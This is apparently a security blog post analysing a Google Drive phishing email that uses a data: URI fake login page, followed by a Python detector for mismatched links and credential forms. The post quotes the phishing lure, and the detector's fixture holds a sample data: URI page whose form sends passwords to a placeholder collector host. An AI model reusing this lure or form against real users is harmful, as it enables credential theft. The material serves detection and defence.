Google Drive Phish Deploys Data URI Technique

Here’s an interesting mail which arrived in my inbox earlier today. It came from a Gmail address tied to a Google+ account which appears to be Chinese in origin, and had me BCC’d in.


The email is called “Document”, and reads:

I tried to get these document across to you before. Hope you get it now? View it, i uploaded using Google doc and sign on with your email to access. View the document its important. >>

drive(dot)google(dot)com/my-drive/chee(dot)tan

Regards

This might look convincing to the unwary, but a simple hover over the link reveals that this isn’t going to take you to Google Drive:

bashoomal(dot)com/redirect.html

The end-user will be presented with a fake Google Drive login page which asks them to fill in their email address / password.


As you can see from the URL bar, this is another phish that takes advantage of the Data URI scheme, which we have previously covered in relation to phishing: the fake login page is not fetched from a web server but is embedded in the address itself, so there is no hosting domain for a URL filter to judge. The Google account sending the mails appears to have been around since 2007, and also has a YouTube account – it seems likely that it has been compromised, and is being used to further the spread of malicious links. At this point, it’s hard to say if this is a one-off or part of a set, but we’ll continue to monitor and update this post accordingly.
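The two checks described above (hovering to compare the displayed link with the real destination, and recognising a login page served from a data: URI) can be automated. The following is an added example written for this post, not ThreatTrack code: it parses RFC 2397 data: URIs, flags inline HTML that carries a password form, and reports when an anchor's visible text names one host while its href goes to another. The sample link text mirrors the lure; the redirect and collector hosts (`redirector.invalid`, `collector.invalid`) and the HTML form are constructed placeholders, not the real phishing page.

```python
import base64
import binascii
import re
from urllib.parse import urlparse, unquote_to_bytes

# Constructed sample: what the victim sees in the mail vs. where the anchor really points.
# "redirector.invalid" stands in for the redirect host named in the post.
SAMPLE_LINK_TEXT = "drive.google.com/my-drive/chee.tan"
SAMPLE_HREF = "http://redirector.invalid/redirect.html"

# Constructed sample of the landing page's address bar: a base64 data: URI holding a
# credential form that posts to an external host (placeholder "collector.invalid").
SAMPLE_HTML = (b'<html><body><form action="http://collector.invalid/p">'
               b'<input name="email"><input type="password" name="pw"></form></body></html>')
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML).decode()

CREDENTIAL_FORM = re.compile(rb"<form[^>]*>.*?type=['\"]?password", re.I | re.S)
FORM_ACTION = re.compile(rb"<form[^>]*action=['\"]?([^'\" >]+)", re.I)


def parse_data_uri(uri):
    """Split an RFC 2397 data: URI into (mediatype, base64 flag, decoded payload bytes).
    Returns None if the string is not a well-formed data: URI."""
    if uri[:5].lower() != "data:":
        return None
    header, sep, payload = uri[5:].partition(",")
    if not sep:
        return None
    fields = header.split(";")
    mediatype = (fields[0] or "text/plain").lower()   # RFC 2397 default
    is_b64 = any(f.lower() == "base64" for f in fields[1:])
    try:
        data = base64.b64decode(payload) if is_b64 else unquote_to_bytes(payload)
    except (binascii.Error, ValueError):
        return None
    return mediatype, is_b64, data


def host_of(url):
    """Hostname of a URL; bare 'host/path' text (as shown in the mail) is accepted too."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def assess_link(link_text, href):
    """The 'hover' check: findings when visible text and real destination disagree."""
    findings = []
    if urlparse(href).scheme.lower() == "data":
        findings.append("href is a data: URI; page content is inline, no server to reputation-check")
        return findings
    shown, actual = host_of(link_text), host_of(href)
    if shown and actual and shown != actual:
        findings.append(f"link text shows host {shown} but href goes to {actual}")
    return findings


def assess_landing(url_bar):
    """Findings for the address bar of the page the victim ends up on."""
    findings = []
    parsed = parse_data_uri(url_bar)
    if parsed is None:
        return findings
    mediatype, is_b64, body = parsed
    findings.append(f"page is served from a data: URI ({mediatype}, base64={is_b64})")
    if mediatype == "text/html" and CREDENTIAL_FORM.search(body):
        findings.append("inline HTML contains a form with a password field")
        m = FORM_ACTION.search(body)
        if m:
            findings.append(f"form posts credentials to {host_of(m.group(1).decode(errors='replace'))}")
    return findings


if __name__ == "__main__":
    for f in assess_link(SAMPLE_LINK_TEXT, SAMPLE_HREF) + assess_landing(SAMPLE_DATA_URI):
        print("FLAG:", f)
```

The hover check only compares hostnames, so a lure that hides the whole URL behind text like "View document" yields no host to compare; pair it with a plain data:-scheme check on every href, which `assess_link` already does. Real mail gateways should also apply the same tests after following any intermediate redirect, since here the data: URI only appears after the redirect page.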

ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.